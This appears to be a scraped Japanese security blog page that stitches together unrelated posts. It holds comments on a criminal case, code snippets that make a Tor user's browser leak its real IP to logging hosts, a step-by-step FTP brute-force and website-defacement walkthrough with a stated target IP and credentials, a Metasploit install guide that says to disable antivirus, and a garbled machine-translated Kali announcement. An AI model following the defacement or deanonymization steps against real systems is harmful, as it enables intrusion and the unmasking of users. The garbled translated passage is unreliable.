片山被告が主張する証拠も情況証拠に過ぎないのでまだわからないです.風向きとして不起訴処分になる公算が強いというのはわかりますが.後に強化されるとすれば,科捜研に情報科学部門が新設されるのではないでしょうか?

高一人参@欠陥遺伝子氏

冤罪になったら警察はやばそうですね

やまざきkei5氏

どうでしょう。仮に冤罪だったら、真犯人は彼の近くにいそう(←根拠なし)ですから、今ごろ職場の人あたりを念入りに調査しているのでは。

connect24h氏

なぜに私へ質問?警察は新たに真犯人を探すだけ、片山容疑者は損害賠償請求するだけでは。ただ、よっぽど決定的な無罪の証拠がなければ、このまま起訴されると思います。例え、裁判で逆転無罪になったとしても、ズルズル数年は裁判が続くでしょう。

Sen UENO氏

表明する見解は特に持ち合わせておりません。

鳥取ループ氏

別の真犯人が捕まるみたいな明確な冤罪ならメディア、警察共に晒し首状態員なるでしょうけど、そうでなければ、ひっそりと終わらせようとするでしょうね。不謹慎ですが、むしろ展開が面白くなる可能性があるのは片山氏が有罪になった場合ではないですか?彼が真犯人だろうとそうでなかろうと、「別の真犯人」が再び声明を出すことは可能ですから。高木先生が有罪と言ったものは無罪だったので、高木先生が冤罪を疑っているということは有罪だな、とおちょくろうかと思いましたがやめましたw

hority>/dev/null氏

こんにちは。冤罪であっても警察は何も学ばないんじゃないかと思ってます、つまり今後も冤罪事件、容疑者の吊し上げはあると思います。ただ、サイバー捜査要員の強化はどんどんしていくんじゃないでしょうか、というかして欲しいですよね。なにも詳しくないし専門家じゃないので適当ですけど。もうちょっと小さな視野での展開ですと、真犯人不明のまま迷宮入りじゃないでしょうか?釈放後になにか声明があるかもですね。

野澤篤史(なぎさ)氏

こんにちは。私見ですが、表面上は何も変わらないと思います。マスコミも今までの事を無かった事にして警察を叩くでしょう。 水面下では、今までの捜査手法についての反省と見直しや強化に税金が注がれるんじゃないですかね。 使い道が正しいかは別問題ですが・・・。

くりす@SECCON-CTF氏

お久しぶりです。私も自分なりに見解を持っていますが、話すととても長くなるのでブログ (https://x86-64.jp/blog ) で公開しようと考えています。こちらの更新が完了しましたら追って連絡します。

white_iceage/ジェブラ氏

これが冤罪、または不起訴処分になると警察はますます思い切った捜査ができなくなると思います。疑わしい人いても迂闊に逮捕に踏み切れないと思います。IT犯罪捜査が遅れていることが更に露呈されるわけですし。  僕はまだ素人なのでこれくらいしか思いつかないですね(^^;;

Dark_quartz氏

まず当然日本警察が批判に晒されるでしょうね。そしてネットも沸く。ネット等に極端に疎い方々は賛否両論orよく分からないままかもしれません。 まぁもしそうなったとして、警察側がどう出るのかが見物ですね。真面目に謝罪して知識人と捜査再開か、シラを切って同じような事を繰り返すのか。あくまで個人的な見解なので、深くは突っ込まないで下さいませ。

祐天寺氏

こんにちは。もし司法機関で有る警察の過ちが認められたら際、これは司法全般に当てはまりますが、単に謝罪だけで終わらせるのではなく目に見える何か罰則の様な物が必要ではないかと考えます。とても困難なハードルですが…

じりず氏

極刑不可避

情報屋Ops_jp(白龍)卍氏

まず、警察の信頼がまた下がるのは確実。 その後どうなるかは”犯人”次第

匿名化ソフト(TOR)で攻撃された場合の生IPアドレス取得方法

難攻不落のTorを使用された攻撃を受けた場合大概の人は泣き寝入りの状況ですが、私達whitehackerzは幾つか有効な生IP取得作戦を考えました。

それぞれ一つ一つでは数%の成功率しかないかもしれませんが、全てやる事により数十パーセント程度になるはずです。

また、記載事項には決定打は載せてません。(我々も犯人追及中の身でありますからご容赦願いたいと思います)これらよりも格段に優れた方法もありますからTor=恐怖という図式も近々崩壊する事と思います。

メソッド1   Adobe Flash Player

Flash Playerは串に非対応
「Flashのロード->リクエストを送信」で生IPを取得でき

ActionScript
var urlRequest:URLRequest = new URLRequest();
urlRequest.url = “http://example.com/log“;
var urlLoader:URLLoader = new URLLoader();
urlLoader.load(urlRequest);

http://help.adobe.com/ja_JP/as3/dev/WS5b3ccc516d4fbf351e63e3d118a9b8f6c0-7ffe.html
http://forums.adobe.com/message/4262734
http://forums.adobe.com/thread/685245

メソッド2   Oracle Java

Javaはブラウザに設定された串を使用できるが、
串を使用せずにリクエストを送信することもできる
「アプレットのロード->リクエストを送信」で生IPを取得でき

Java
URL url = new URL(“http://anonymouse.com/log“);
URLConnection conn = url.openConnection(Proxy.NO_PROXY);

http://www.rgagnon.com/javadetails/java-0085.html

メソッド3   Microsoft Silverlight

SilverlightのHTTPクライアントはブラウザに設定された串を使用するが、
ソケットクラスを使用すれば串をbypassできる
メソッド1と2のように生IPを取得できる

Silverlight + C#
var socket = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp);
var socketAsyncEventArgs = new SocketAsyncEventArgs();
socketAsyncEventArgs.RemoteEndPoint = new DnsEndPoint(“anonymouse.com“, 80);
socket.ConnectAsync(socketAsyncEventArgs);

System.Net.Sockets
http://msdn.microsoft.com/en-us/library/system.net.sockets(v=vs.95).aspx
Silverlight 2 and System.Net.Sockets.Socket
http://weblogs.asp.net/mschwarz/archive/2008/03/07/silverlight-2-and-sockets.aspx

メソッド4   WebSocket

実装によってはブラウザの串の設定を無視することもある
串の設定を無視するような実装であれば生IPを取得できる

JavaScript
socket = new WebSocket(“ws://h0lnugtzsrpbx1wj.anonymouse.com:8800/log“);
socket.send(‘test’);

FirefoxのWebSocketでDNS漏れ
https://blog.torproject.org/blog/firefox-security-bug-proxy-bypass-current-tbbs

http://www.html5rocks.com/ja/tutorials/websockets/basics/
http://ja.wikipedia.org/wiki/WebSocket

メソッド5   SSL

ブラウザの設定によっては、SSLを使用した接続のとき串を通さないことがある
サイト全体をSSL接続にすることが不可能な場合は、
0pxの画像をページに入れると生IPを取得できる
<img width=”0″ src=”https://domain/0px.jpg“>

メソッド6   TorDNSELを利用してアク禁

悪意を持つユーザーにTorを悪用させない最も有効な手段
アク禁

https://www.torproject.org/projects/tordnsel.html.en

ホームページ改ざん方法(ブルートフォースアタック・総当たり攻撃使用編)

ブルートフォースアタックを使用してFTPのIDとパスワード取得してホームページのトップページを改ざんする方法

対象となるサイトは当校が用意したデモ用のショッピングサイト
http://www.ebaburashopping.jpburuburu001

改ざんするホームページを確認いただきましたら、
次にFTPのIDとパスワードを解析するソフトをダウンロードします。

ソフトのダウンロード先は、
http://www.whitehackerz.jp/tools/brutus.exe
となります。buruburu003
ブラウザを立ち上げてソフトをダウンロードしてください。

ソフトを解凍する際、パスワードを聞いてきますので、パスワードを
whitehackerz#99
と入力してください。
デスクトップ上に解凍されます。

『brutus』というフォルダが作られていますので、クリックしてフォルダを開きます。

「BrutusA2.exe」をダブルクリックしてソフトを起動します。buruburu006

次に各種設定を行います。

まずは接続するサーバーのIPアドレスを調べます。
左下のWindowsアイコンをクリックし、すべてのプログラムの中にあるアクセサリの中の「コマンドプロンプト」クリックして起動します。
ちなみにキーボードの
Windowsマークを押しながらRボタンを押し、名前の箇所にcmdと入力しても起動できます。

次にエバブラショッピングサイトのIPアドレスを調査します。
ここでは、pig(ピング)コマンドを使います。

コマンドプロンプトに
ping(スペース)ebaburashopping.jp
と入力し、Enterキーを押します。
そこに表示されているIPアドレスを控えてください。buruburu005

次に「BrutusA2」のソフトに戻り、Targetの箇所に先程控えておいたIPアドレスを入力します
IPアドレスは
219.117.206.14
です。

次にTypeからFTPを選択します。
その他の設定は変更しません。

ではStartボタンをクリックして解析を開始しましょう。buruburu007

解析が完了して、FTPのIDとパスワードが見つかると、ここに表示されます。
では実際に、解析したIDとパスワードを使い、FTP接続できるか確認してみましょう。buruburu008

先程、立ち上げたコマンドプロンプトに戻り、
ftp
と入力しEnterキーを押します。
openと入力し、スペースを一つ空け、IPアドレスを入力してEnterキーを押します。

IPアドレスは
219.117.206.14
です。

次にユーザー名を聞いてきますので、ユーザー名を入力し、Enterキーを押します。
ユーザー名は、
ftpuser
です。

次にパスワードを聞いてきますので、パスワードを入力し、Enterキーを押します。
パスワードは、
1234
です。
IDとパスワードが正しければ、
Login successful
と表示され、接続成功です。

サーバーに繋がりましたので、ファイルのリストを表示してみましょう。

コマンドプロンプトに
ls(エルエス)
と入力しEnterキーを押してください。
リストが表示されました。

それでは、トップページをウェブサーバーから取得しましょう。
その前にファイルを取得し保存するための専用フォルダをCドライブの直下に「web」という名前で作成しておきましょう。

次にコマンドプロンプトに戻り、get(ゲット)コマンドを使い、インデックスファイルを取得します。その際、phpファイルをhtmlにリネームし、取得します。

ファイルが実際にダウンロードされたか確認します。

メモ帳を開き、落としたファイルを開いて、編集します。
メモ帳を開いたらファイルから「開く」で、先程のファイルを開いて一旦中身を全部消去します。

次に、文章をこのように入力します。

<h1>WEB改ざん成功!!!</h1>

上書き保存をしてメモ帳を閉じます。

次にコマンドプロンプトに戻り、put(プット)コマンドを使ってファイルをアップしましょう。

これでファイルがアップされました。以上でトップページが入れ替わります。
アクセスして確認しましょう。
確認したらdel(デル)コマンドを使ってファイルを削除し、元に戻しましょう。

Metasploit世界最強ツールのインストール方法

寒い日が続いていますが皆様如何お過ごしでしょうか?そんな寒さを吹き飛ばす激熱世界最強ツールをご紹介します。

その世界最強ツールの名はMetasploitmetasploit001

サーバーだろうが、クライアントだろうが攻撃ツールとしては破壊力抜群で世界最強。
Metasploitを使えば、ターゲットを調査⇒脆弱性発見⇒攻撃⇒権限取得までのかなりの部分を自動化出来、あとは情報を抜いたり自由に操作したり・・・。脳内沸騰間違いなしのツールなのです。

wikipediaでは

exploitコードの作成や実行を行うためのフレームワークである。セキュリティ業界ではよく知られたツールであり、ペネトレーションテスト目的で使用可能な1DVDタイプのLinuxであるBackTrackに収録されている。
どの脆弱性を用いるか、攻撃成功時にどのようなペイロードを適用するか、ペイロードが侵入防止システムに検出されるのを妨害するためにどのような
エンコード技術を用いるか、ペイロードによってリモートシェルやVNCサーバーなどをどのポート番号で起動するかなどの、exploitを成立させる各種要素を選択肢から選んで組み合わせて実行するといったように、簡単な方法で攻撃実行可能となっている。
また、初期のフレームワークはキャラクタユーザインタフェース(コマンドラインインタフェース/対話型コマンドラインインタフェース)であったが、
後のバージョンおよび第三者によって、Webインターフェイス(但しバージョン3.3でサポート打ち切り)やGUIインターフェースなども作られている。

と紹介されている。
さぁそれではMetasploitをインストールしていきましょう!

まず、Metasploitサイトのダウンロードページ(http://www.metasploit.com/download/)で赤印で囲ったMetasploit Community EditionのWindows版をダウンロードしましょう!metasploit002

ダウンロードしたmetasploit-latest-windows-installer.exeを実行すると最初にこの画面のお出ましです。ウイルスソフトが動いているとインストールに失敗したり、Exploitが作動しなくなる事がありますので十分注意して下さい!という旨です。metasploit003

OKをクリックして進むとまたまた警告文が出現します。頭が痛くなってくる所でしょうがここは辛抱です。これはファイアウォールを無効にして下さい!と言う警告ですが、インストール時点では関係がありますん。Metasploitを使う時には必須ですので後ほど確認しましょう!metasploit004

またOKするとインストールウィザードが始まります!metasploit006

使用許諾契約に続きます。metasploit007

インストール先フォルダの設定です。NEXT!NEXTでいいのじゃないでしょうか?metasploit008

次にMetasploitサービスが使用するポートを聞かれる事になります。デフォルトでまぁ問題はないでしょうが、既にこのポートを使用している場合は適当に設定して下さい!metasploit009

完全粉飾ドメインを入れて下さいと出て来ますが私達はwhitehackerzとしました!貴方は何hackerz??metasploit010

そしていよいよ準備はいいですか?と聞いてきますので満を持して勢いよくNEXTしましょう!metasploit011

するといよいよ始まりました!!!metasploit012

ここで前半に述べた様にウイルスソフトをそのままにしておくとこの様に全身をつんざく怪音と共にウイルスソフトが大活躍してしまいますので十分ご注意ください!metasploit013metasploit014

そしてついにインストール完了です!一気にFinishと行きたい所ですが、Web UIを使用するのにユーザー登録の必要がでてきますので煩わしかったり、ConsoleやArmitageしか使わないのであればサクッとチェックボックスからチェックをハズしてしまいましょう!metasploit015

最強ツールを使う為の準備如何でしたか?最強ツールを使用するにはまず己自身に磨きをかけて使用するに値する人間であるかどうか?慎重に判断してください!むやみやたらなMetasploitの使用は不幸な結末が控えていると言っても過言ではありません。

それではMetasploit快適ライフをお楽しみくださいませ!今後使用方法等も順次公開していきます。

BackTrackリニューアルリリース!その名もKALI(カーリー)

日時は未定ですが BackTrackリニューアルリリースされるようです!kali01

もともと、BackTrackのLinuxは、私たちの個人的な使用のために開発されましたが、過去数年間で、それは我々が想像するよりもはるかに大きな人気が成長してきました。私たちは毎日それを使用するため、我々はまだ、自分のためにバックトラックを開発しています。しかし、成長と巨大なユーザーベースで、我々は、我々のユーザーが自分自身への義務を有しており、オープンソースコミュニティは、我々はおそらく可能な限り最高のディストリビューションを作成する。

これを念頭に置いて、約一年前で私たちの束攻勢セキュリティはについて考え始めたバックトラックの将来、我々は次のと今後の改正で見てみたい特徴と機能についてブレインストーミングを行った。会話の私たちの主なトピックの一つは、本格的なDebianの準拠パッケージとリポジトリシステムのための私達のカスタム開発環境のスワップアウトのオプションでした。

これは一度に良いアイデアのように思えたが、少し我々はに自分自身を得ていた傷や痛みの世界を知っていた。バックトラックの将来経路に関するこの単一の意思決定には、それにそれが私たちの流通の顔を変更したことをそんなにパワーと柔軟性をもたらした。

この一年間で何が起こったの?私たちは静かに必要なインフラを開発し、当社の最新の侵入テストの配布のための基盤を築くだけでなく、8つの異なる言語で300以上のDebian準拠パッケージと宣誓を構築してきました。これらの変化は、彼らとの仕事、研究と学習の信じられないほどの量を持ってきただけでなく、我々が今まで作った中で最高の、そして最も柔軟性の高い、ペネトレーションテストディストリビューションを作成することへのパスを私たちをリードしている、 “カーリー”と呼ばれる。

 

Kali Linux – A Teaser into the Future.